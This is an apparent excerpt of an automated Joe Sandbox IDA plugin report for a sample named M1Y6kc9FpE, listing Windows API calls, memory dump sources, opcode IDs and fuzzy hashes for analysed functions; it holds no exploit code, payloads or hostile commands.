                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DeleteFile$H_prolog3_
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3558260747-0
                                                                                                                                                      • Opcode ID: 351386f8f35c2c7af49df0e4051795d2209ccd6b144410f7f06ac87bb6241530
                                                                                                                                                      • Instruction ID: 37859a7cabd129345586272dc75f4a02c40e1f1cc96179c2d3ef6e0a886eedf3
                                                                                                                                                      • Opcode Fuzzy Hash: 351386f8f35c2c7af49df0e4051795d2209ccd6b144410f7f06ac87bb6241530
                                                                                                                                                      • Instruction Fuzzy Hash: B3111675D10229DBDF04DFE8E989ADEB7B8BF48311F14142AF801E7250DB34A984CBA4
                                                                                                                                                      APIs
                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00A2ED26
                                                                                                                                                      • GetFileAttributesW.KERNELBASE(?,00000024,00A2ED16,00000000,00A2A4A1,5C02E116,?,00A2CDDD,?,?,?,?,?,?,?,?), ref: 00A2ED39
                                                                                                                                                      • GetFileAttributesW.KERNELBASE(?,?,?), ref: 00A2ED79
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AttributesFile$H_prolog3_
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2559025557-0
                                                                                                                                                      • Opcode ID: 919f4aa6a2970fd15beb285592e67721d17fcd844e05f96f6aba3654a5bcea73
                                                                                                                                                      • Instruction ID: a6d386440c2626fe5c404dc4ad284b26f623ab9e37676edb017fbcf892146b7a
                                                                                                                                                      • Opcode Fuzzy Hash: 919f4aa6a2970fd15beb285592e67721d17fcd844e05f96f6aba3654a5bcea73
                                                                                                                                                      • Instruction Fuzzy Hash: 85110475D00218DFDF04DFE8E9899EDB7F9BB48321F14042AE501F3280DB3499858B64
                                                                                                                                                      APIs
                                                                                                                                                      • SetFilePointer.KERNELBASE(000000FF,?,?,?,?,00000000,?,00000000,00A2E3B1,?,?,00000000,?,?,00A2CC21,?), ref: 00A2E55F
                                                                                                                                                      • GetLastError.KERNEL32 ref: 00A2E56E
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorFileLastPointer
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2976181284-0
                                                                                                                                                      • Opcode ID: 4ddcc8db6d9ac8cf2825b449604c1e990e584fea01018280d1fd2b547b8b7ac8
                                                                                                                                                      • Instruction ID: cb437f30fc28dc93221e11a017d20a40128ef45f5f62403a3e904c8e3eb3799e
                                                                                                                                                      • Opcode Fuzzy Hash: 4ddcc8db6d9ac8cf2825b449604c1e990e584fea01018280d1fd2b547b8b7ac8
                                                                                                                                                      • Instruction Fuzzy Hash: 9041E4306043658BD724FF69E5846AAB3E5FB98320F14493DE88583241E776ECC58BA2
                                                                                                                                                      APIs
                                                                                                                                                      • FlushFileBuffers.KERNEL32(?), ref: 00A2E78C
                                                                                                                                                      • SetFileTime.KERNELBASE(?,?,?,?), ref: 00A2E840
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$BuffersFlushTime
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1392018926-0
                                                                                                                                                      • Opcode ID: e6e2c9e408250f428389ded5087005536d4f0c9ddb4ff419eaa5328f4eca543e
                                                                                                                                                      • Instruction ID: fdb5f98615c7015a353014c854d5351b5ab9ccf1d452389a9f4eaf502bc3da62
                                                                                                                                                      • Opcode Fuzzy Hash: e6e2c9e408250f428389ded5087005536d4f0c9ddb4ff419eaa5328f4eca543e
                                                                                                                                                      • Instruction Fuzzy Hash: 1721E1312493A1EFC714DF68D891AABBBE8AF95304F08492CF4C5C3181D329E98DD762
                                                                                                                                                      APIs
                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00A3FB52
                                                                                                                                                      • SHFileOperationW.SHELL32(?,?,?,?,?,?,00000000,00A7535C), ref: 00A3FC24
                                                                                                                                                        • Part of subcall function 00A214A7: _wcslen.LIBCMT ref: 00A214B8
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileH_prolog3_Operation_wcslen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3104323202-0
APIs
• SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00A2E897
• GetLastError.KERNEL32 ref: 00A2E8A4
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
Similarity
• API ID: ErrorFileLastPointer
• API String ID: 2976181284-0
APIs
• __EH_prolog3_catch_GS.LIBCMT ref: 00A43C82
• _wcslen.LIBCMT ref: 00A43C99
  • Part of subcall function 00A36A89: _wcslen.LIBCMT ref: 00A36AA6
  • Part of subcall function 00A2B03D: __EH_prolog3_GS.LIBCMT ref: 00A2B044
  • Part of subcall function 00A2B3E1: __EH_prolog3_GS.LIBCMT ref: 00A2B3E8
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
Similarity
• API ID: H_prolog3__wcslen$H_prolog3_catch_
• API String ID: 1265872803-0
APIs
• __EH_prolog3_GS.LIBCMT ref: 00A21CE9
• GetDlgItem.USER32(?,?), ref: 00A21D01
  • Part of subcall function 00A214A7: _wcslen.LIBCMT ref: 00A214B8
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
Similarity
• API ID: H_prolog3_Item_wcslen
• API String ID: 896027972-0
APIs
• GetCurrentProcess.KERNEL32(02000000,?,00000002,00000002,?,00A376EA,00A30B6F), ref: 00A376B4
• GetProcessAffinityMask.KERNEL32(00000000,?,00A376EA), ref: 00A376BB
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
Similarity
• API ID: Process$AffinityCurrentMask
• API String ID: 1231390398-0
APIs
• GdiplusShutdown.GDIPLUS(?,?,?,?,00A59B73,000000FF), ref: 00A3F578
• CoUninitialize.COMBASE(?,?,?,?,00A59B73,000000FF), ref: 00A3F57D
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
Similarity
• API ID: GdiplusShutdownUninitialize
• API String ID: 3856339756-0
APIs
• GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00A3E86A
• GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00A3E871
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
Similarity
• API ID: BitmapCreateFromGdipStream
• API String ID: 1918208029-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
Similarity
• API ID: ItemShowWindow
• API String ID: 3351165006-0
APIs
• GetDlgItem.USER32(?,?), ref: 00A21CD2
• KiUserCallbackDispatcher.NTDLL(00000000), ref: 00A21CD9
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CallbackDispatcherItemUser
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4250310104-0
                                                                                                                                                      • Opcode ID: 9d20655099427c590841a931840ff3df79fce4fbf0ac49135951fb9820af90a7
                                                                                                                                                      • Instruction ID: bb2ca0b798e2fa26e7d118f9ede7560b889eb198c31af0429eb11463436b84a4
                                                                                                                                                      • Opcode Fuzzy Hash: 9d20655099427c590841a931840ff3df79fce4fbf0ac49135951fb9820af90a7
                                                                                                                                                      • Instruction Fuzzy Hash: F1C04C7640C240BFCB019BE09D1CC2FBFA9AB95311F40CA59B6A9C0130C6358451DB11

APIs
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
Similarity
• API ID: H_prolog3
• String ID:
• API String ID: 431132790-0
• Opcode ID: 0d40bcaa2bbb1f0fc8d5cae4094bc45fa1ddafd6c6fc317642709233a51d2914
• Instruction ID: 6e1b576bd624d177c88d826978ce287f9701a65f0891ffe05c81f4bd21a8c65b
• Opcode Fuzzy Hash: 0d40bcaa2bbb1f0fc8d5cae4094bc45fa1ddafd6c6fc317642709233a51d2914
• Instruction Fuzzy Hash: 47C18C70A04364AFDF25DF6CE8947ED7BA4AB49310F1800B9EC05DF296C7749985CBA2

APIs
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
Similarity
• API ID: H_prolog3
• String ID:
• API String ID: 431132790-0
• Opcode ID: 81a7bde6cd0b2158cef1d0d86f65db2c6d365a169719fef7ff525f1a345e49d2
• Instruction ID: b59811ee0a33bc5be04048de66d9f0e19cae4af87c93a60a50d88f67137229af
• Opcode Fuzzy Hash: 81a7bde6cd0b2158cef1d0d86f65db2c6d365a169719fef7ff525f1a345e49d2
• Instruction Fuzzy Hash: 468104719083559FDB28EF68C986B6FB7E9FF80310F14092EF45597281EBF099488792

APIs
• __EH_prolog3.LIBCMT ref: 00A220B7
  • Part of subcall function 00A280EC: __EH_prolog3.LIBCMT ref: 00A280F3
  • Part of subcall function 00A32815: __EH_prolog3.LIBCMT ref: 00A3281C
  • Part of subcall function 00A276E7: __EH_prolog3.LIBCMT ref: 00A276EE
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
Similarity
• API ID: H_prolog3
• String ID:
• API String ID: 431132790-0
• Opcode ID: 838a43f2fa718eb643f457548b932d27ee11c7424f2d4567dbaa9dd6bf6c5bcb
• Instruction ID: 36d888d0a9ff887d7f71478e64115dfbfb2ce1e33c65032c94d80300b2416027
• Opcode Fuzzy Hash: 838a43f2fa718eb643f457548b932d27ee11c7424f2d4567dbaa9dd6bf6c5bcb
• Instruction Fuzzy Hash: D051F4B19057808EDB44DF6995807C9BBE0AF99300F0886BEDC4DCF6ABD7744254CB61

APIs
• __EH_prolog3_GS.LIBCMT ref: 00A2B3E8
  • Part of subcall function 00A2F711: FindClose.KERNELBASE(00000000,000000FF,00000049,00000049,?,?,00A2A684,?,?,00000000,?,?,?,?,?,?), ref: 00A2F739
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
Similarity
• API ID: CloseFindH_prolog3_
• String ID:
• API String ID: 2672038326-0
• Opcode ID: bf5088e5f74d18aa450f7011884a32f317b53f98e877153d3190066fbd70a490
• Instruction ID: cc6e0430ed8b52d230b118bb43b855f3c4a923d40dfad973a4fd421ed661e68d
• Opcode Fuzzy Hash: bf5088e5f74d18aa450f7011884a32f317b53f98e877153d3190066fbd70a490
• Instruction Fuzzy Hash: DA417670910B28CFDB24EFADE9C1BAAB7B1BF05304F54443DE15A9B252D734A846CB21

APIs
• __EH_prolog3_GS.LIBCMT ref: 00A22C37
  • Part of subcall function 00A3880E: __EH_prolog3.LIBCMT ref: 00A38815
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
Similarity
• API ID: H_prolog3H_prolog3_
• String ID:
• API String ID: 3355343447-0
• Opcode ID: 5335ce168b80cb0b00bbdb47a8f3f91dd7b47981ddac857733feefa1f9481597
• Instruction ID: b24100dd78bb2702d1a85f0f052b52e34bb2361d2a1ccce915156b1b5cd57f21
• Opcode Fuzzy Hash: 5335ce168b80cb0b00bbdb47a8f3f91dd7b47981ddac857733feefa1f9481597
• Instruction Fuzzy Hash: D6310F75D0121CFECF19DBE8E991AEEBBB9AF18340F54043AF405A7251DB349945CB60

APIs
• __EH_prolog3.LIBCMT ref: 00A276EE
  • Part of subcall function 00A34F2B: __EH_prolog3.LIBCMT ref: 00A34F32
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
Similarity
• API ID: H_prolog3
• String ID:
• API String ID: 431132790-0
• Opcode ID: 85d4cd8853af708ac74c018c5a184247f6a30e3e4434d6cdc4909b26781d849e
• Instruction ID: 1796f3c48e31a6e2df02db1983c8d0155b6c809673010a8e4136c8165d438a0f
• Opcode Fuzzy Hash: 85d4cd8853af708ac74c018c5a184247f6a30e3e4434d6cdc4909b26781d849e
• Instruction Fuzzy Hash: 714152B4806B85DAC725DF7A92493CAFBE8AFA4300F10995FD1AE93361D7B025048F19

APIs
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
Similarity
• API ID: H_prolog3
• String ID:
• API String ID: 431132790-0
• Opcode ID: c340e9d581ab02240d0a515c51e872d1a4a837a17175057b36bd9ffb04591d7b
• Instruction ID: f4619288fd4b75ed087f3aaf0f4bc98d4591f2d90e9b973edb3af0051a6d951d
• Opcode Fuzzy Hash: c340e9d581ab02240d0a515c51e872d1a4a837a17175057b36bd9ffb04591d7b
• Instruction Fuzzy Hash: 6521C575E00616ABEF18EF788D46A5F76A4BF85314F05063AF505AB2C2E7B09D40C7E4
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: H_prolog3
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 431132790-0
                                                                                                                                                      • Opcode ID: 429cf5d7e1cc259708b6e9ca53865d3757c7cd7a2aa1153b0adaaf5be8eaf76b
                                                                                                                                                      • Instruction ID: 9cda0dcdfe320bbcdd7fb4b5626386a4224f9354d964994af6aaf556b1f87dbf
                                                                                                                                                      • Opcode Fuzzy Hash: 429cf5d7e1cc259708b6e9ca53865d3757c7cd7a2aa1153b0adaaf5be8eaf76b
                                                                                                                                                      • Instruction Fuzzy Hash: D5216576E0162A9BDB14DFEDDD81AAFB7B9BF88340F14042AF504B7202DB749E048795
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: H_prolog3_
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2427045233-0
                                                                                                                                                      • Opcode ID: 4ffa3c45ef813fdbbdb89dfe9877b9c6840e26db323431faef3b3cede32c06bc
                                                                                                                                                      • Instruction ID: 45ab337b4c44c2a7a3a7f68f9a8b701b4448d95ecd1441c933a8b06fe85483b6
                                                                                                                                                      • Opcode Fuzzy Hash: 4ffa3c45ef813fdbbdb89dfe9877b9c6840e26db323431faef3b3cede32c06bc
                                                                                                                                                      • Instruction Fuzzy Hash: 8F21D835A013249EDF20DF6DDA46EEE73E9EF12750F149528F442AB181C7749D89C760
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: H_prolog3_
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2427045233-0
                                                                                                                                                      • Opcode ID: 209912a6ad97bcb60b91881445d6497ccb5a1273f73633d4a2752b191cf8a955
                                                                                                                                                      • Instruction ID: c8183a69da5f049cd36fd2f332993dbe049dfc508ebb08afe4b4693ea728d49a
                                                                                                                                                      • Opcode Fuzzy Hash: 209912a6ad97bcb60b91881445d6497ccb5a1273f73633d4a2752b191cf8a955
                                                                                                                                                      • Instruction Fuzzy Hash: 47212C75D00208DFDB08EFE9D985BDD7BB9AF88301F144429F504EB252DA35AA85CB61
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A51DE6: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00A500BA,00000001,00000364,?,00A46C16,?,?,?,?,?,00A45269,00A4535E), ref: 00A51E27
                                                                                                                                                      • _free.LIBCMT ref: 00A53195
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocateHeap_free
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 614378929-0
                                                                                                                                                      • Opcode ID: 1518d1659949646fcdc75e8b8cef56d87410417c591bed282bf1eeecc91b9cfd
                                                                                                                                                      • Instruction ID: 707f977d76b7874e70199ab5b0c7e7501484280f54f9a2e326f536bf893b4c96
                                                                                                                                                      • Opcode Fuzzy Hash: 1518d1659949646fcdc75e8b8cef56d87410417c591bed282bf1eeecc91b9cfd
                                                                                                                                                      • Instruction Fuzzy Hash: F60149B32007056BEB21CF65DC85E5AFBE9FBC5371F25061DE99483280EA30A909C774
